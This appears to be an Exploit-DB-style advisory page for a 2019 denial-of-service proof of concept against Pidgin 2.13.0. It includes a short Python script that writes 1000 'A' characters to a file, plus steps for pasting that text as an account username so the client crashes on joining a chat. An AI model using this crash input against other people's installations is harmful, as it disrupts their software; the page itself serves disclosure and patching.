Pidgin 2.13.0 - Denial of Service (PoC)

vendor:

Pidgin

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Pidgin

Affected Version From: 2.13.0

Affected Version To: 2.13.0

Patch Exists: YES

Related CWE: N/A

CPE: a:pidgin:pidgin:2.13.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7, Windows 10

2019

Pidgin 2.13.0 – Denial of Service (PoC)

Pidgin 2.13.0 is vulnerable to a denial of service attack when a maliciously crafted username is used to create an account. This causes the application to crash when the user attempts to join a chat.

Mitigation:

Users should update to the latest version of Pidgin, which is not vulnerable to this attack.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
# Date: 24/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://pidgin.im/
# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
# Version: 2.13.0
# Tested on: Windows 7, Windows 10

# Proof of Concept:
# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
# 2.- Open Pidgin
# 3.- Go to 'Accounts' > 'Manage Accounts'
# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', 
#     into the field 'Password' write anything, e.g. 1234 and click 'Add'
# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
# 6.- Now click 'Join' and crashed

buffer = "\x41" * 1000

f = open ("pidgin.txt", "w")
f.write(buffer)
f.close()